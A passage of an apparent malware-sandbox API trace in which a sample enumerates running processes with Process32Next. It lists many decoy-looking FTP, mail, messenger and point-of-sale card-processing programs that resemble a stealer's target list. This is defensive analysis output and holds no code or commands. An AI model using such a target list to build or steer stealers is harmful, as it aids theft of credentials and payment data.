cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.566] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.568] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.569] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.571] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.573] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.575] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0206.577] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.579] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0206.580] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0206.582] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0206.584] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0206.588] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0206.590] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0206.592] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.594] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.596] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.598] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.601] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.603] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.605] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.607] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.608] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0206.610] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0206.612] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0206.613] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0206.615] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0206.617] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0206.619] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0206.621] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0206.623] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0206.629] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0206.631] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0206.633] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0206.635] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0206.636] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0206.638] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0206.640] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0206.642] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0206.644] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0206.646] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0206.649] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0206.651] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0206.653] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0206.655] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0206.658] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0206.660] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0206.662] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0206.666] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0206.668] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0206.671] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0206.673] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0206.675] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0206.677] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0206.680] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0206.682] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0206.684] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0206.686] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0206.688] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0206.690] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0206.692] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0206.695] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0206.697] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0206.699] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0206.701] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0206.706] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0206.708] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0206.711] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0206.714] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0206.716] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0206.719] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0206.722] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0206.724] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0206.727] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0206.728] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0206.730] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0206.732] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0206.735] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0206.738] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0206.740] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0206.743] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0206.745] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0206.747] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0206.749] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.752] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, 